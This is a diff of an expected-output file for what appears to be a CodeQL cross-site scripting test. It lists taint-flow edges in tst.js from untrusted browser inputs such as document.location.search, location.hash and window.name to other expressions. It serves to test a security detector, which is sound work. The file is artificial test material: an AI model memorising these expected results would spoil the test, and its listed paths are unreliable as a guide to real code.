provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
